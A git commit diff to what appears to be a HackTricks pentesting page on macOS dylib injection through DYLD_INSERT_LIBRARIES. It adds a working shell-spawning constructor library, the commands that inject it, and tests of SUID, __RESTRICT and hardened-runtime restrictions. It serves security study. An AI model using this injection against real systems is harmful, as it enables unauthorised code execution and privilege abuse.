GITBOOK-3926: change request with no subject merged in GitBook
This commit is contained in:
parent
2b401d3335
commit
3484d7008e
@ -1132,11 +1132,12 @@ In the function **`processRestricted`** the reason of the restriction is set. Ch
|
||||
* Existence of `__RESTRICT/__restrict` section in the macho binary.
|
||||
* The software has entitlements (hardened runtime) without [`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables) entitlement or [`com.apple.security.cs.disable-library-validation`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_disable-library-validation).
|
||||
* If the lib is signed with the same certificate as the binary
|
||||
* This will bypass the previous restrictions
|
||||
|
||||
In more updated versions you can find this logic at the second part of the function **`configureProcessRestrictions`.** However, what is executed in newer versions is the **beginning checks of the function** (you can remove the ifs related to iOS or simulation as those won't be used in macOS:.
|
||||
In more updated versions you can find this logic at the second part of the function **`configureProcessRestrictions`.** However, what is executed in newer versions is the **beginning checks of the function** (you can remove the ifs related to iOS or simulation as those won't be used in macOS.
|
||||
{% endhint %}
|
||||
|
||||
Find a example on how to (ab)use this in:
|
||||
Find a example on how to (ab)use this and check the restrictions in:
|
||||
|
||||
{% content-ref url="dyld_insert_libraries.md" %}
|
||||
[dyld\_insert\_libraries.md](dyld\_insert\_libraries.md)
|
||||
|
@ -12,22 +12,22 @@
|
||||
|
||||
</details>
|
||||
|
||||
### Basic example
|
||||
## Basic example
|
||||
|
||||
**Library to inject** to execute a shell:
|
||||
|
||||
```c
|
||||
// gcc -dynamiclib example.c -o example.dylib
|
||||
// gcc -dynamiclib -o inject.dylib inject.c
|
||||
|
||||
#include <stdio.h>
|
||||
#include <syslog.h>
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
__attribute__((constructor))
|
||||
|
||||
int myconstructor(int argc, const char **argv)
|
||||
{
|
||||
printf("[+] dylib injected in %s\n", argv[0]);
|
||||
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
|
||||
printf("[+] dylib injected in %s\n", argv[0]);
|
||||
execv("/bin/bash", 0);
|
||||
}
|
||||
```
|
||||
@ -48,17 +48,56 @@ int main()
|
||||
Injection:
|
||||
|
||||
```bash
|
||||
DYLD_INSERT_LIBRARIES=example.dylib ./hello
|
||||
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
|
||||
```
|
||||
|
||||
### Bigger Scale
|
||||
## Bigger Scale
|
||||
|
||||
If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` executeion).
|
||||
If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` execution).
|
||||
|
||||
```bash
|
||||
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "dylib injected"'
|
||||
```
|
||||
|
||||
## Check restrictions
|
||||
|
||||
### SUID & SGID
|
||||
|
||||
```bash
|
||||
# Make it owned by root and suid
|
||||
sudo chown root hello
|
||||
sudo chmod +s hello
|
||||
# Insert the library
|
||||
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
|
||||
|
||||
# Remove suid
|
||||
sudo chmod -s hello
|
||||
```
|
||||
|
||||
### Section `__RESTRICT` with segment `__restrict`
|
||||
|
||||
```bash
|
||||
gcc -sectcreate __RESTRICT __restrict /dev/null hello.c -o hello-restrict
|
||||
DYLD_INSERT_LIBRARIES=inject.dylib ./hello-restrict
|
||||
```
|
||||
|
||||
### Hardened runtime
|
||||
|
||||
Create a new certificate in the Keychain and use it to sign the binary:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
codesign -s <cert-name> --option=runtime ./hello
|
||||
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
|
||||
|
||||
codesign -f -s <cert-name> --option=library ./hello
|
||||
DYLD_INSERT_LIBRARIES=example.dylib ./hello-signed #Will throw an error because signature of binary and library aren't signed by same cert
|
||||
|
||||
codesign -s <cert-name> inject.dylib
|
||||
DYLD_INSERT_LIBRARIES=example.dylib ./hello-signed #Throw an error because an Apple dev certificate is needed
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
Loading…
Reference in New Issue
Block a user